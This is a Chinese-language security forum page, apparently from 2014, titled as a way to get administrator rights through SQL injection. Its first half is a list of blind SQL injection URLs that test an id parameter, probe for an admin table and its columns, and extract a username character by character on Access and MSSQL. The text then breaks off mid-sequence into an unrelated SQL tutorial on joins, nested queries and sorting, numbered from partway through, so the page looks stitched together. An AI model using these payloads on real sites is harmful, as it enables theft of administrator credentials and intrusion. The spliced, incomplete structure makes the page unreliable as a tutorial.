開源互助社區>文檔>安全技術

Sql注入輕鬆獲得管理員許可權

←手機掃碼閱讀火星人 @ 2014-03-09 , reply:0

檢測可否注入

http://127.0.0.1/xx?id=11 and 1=1 (正常頁面)

http://127.0.0.1/xx?id=11 and 1=2 (出錯頁面)

檢測表段的

http://127.0.0.1/xx?id=11 and exists (select * from admin)

檢測欄位的

http://127.0.0.1/xx?id=11 and exists (select username from admin)

檢測ID

http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)

檢測長度的

http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)

檢測長度的

http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)

檢測是否為MSSQL資料庫

http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)

檢測是否為英文

(ACCESS資料庫)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)

(MSSQL資料庫)

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)

檢測英文的範圍

(ACCESS資料庫)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)

(MSSQL資料庫)

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)

檢測那個字元

(ACCESS資料庫)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)

左連接特點：顯示全部左邊表中的所有項目,即使其中有些項中的數據未填寫完全.

左外連接返回那些存在於左表而右表中卻沒有的行,再加上內連接的行.

b2.右連接

與左連接類似

b3.全連接

select sno,name,major from students FULL JOIN majors ON students.mno=majors.mno

兩邊表中的內容全部顯示

c.自身連接

select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses c2 where c1.pno=c2.cno

採用別名解決問題.

d.交*連接

select lastname firstname from lastname CROSS JOIN firstanme

相當於做笛卡兒積

8.嵌套查詢

a.用關鍵字IN,如查詢豬豬山的同鄉：

select * from students where native in (select native from students where name=』豬豬』)

b.使用關鍵字EXIST,比如,下面兩句是等價的：

select * from students where sno in (select sno from grades where cno=』B2』)

select * from students where exists (select * from grades where grades.sno=students.sno AND cno=』B2』)

9.關於排序order

a.對於排序order,有兩種方法：asc升序和desc降序

b.對於排序order,可以按照查詢條件中的某項排列,而且這項可用數字錶示,如：

select sno,count(*) ,avg(mark) from grades group by sno having avg(mark)>85 order by 3

10.其他

a.對於有空格的識別名稱,應該用"[]"括住.

b.對於某列中沒有數據的特定查詢可以用null判斷,如select sno,courseno from grades where mark IS NULL

c.注意區分在嵌套查詢中使用的any與all的區別,any相當於邏輯運算「||」而all則相當於邏輯運算「&&」

Tags:

[火星人 ] Sql注入輕鬆獲得管理員許可權已經有291次圍觀

本文地址：http://coctec.com/docs/security/show-post-59110.html

Sql注入輕鬆獲得管理員許可權

熱門文章

最新文章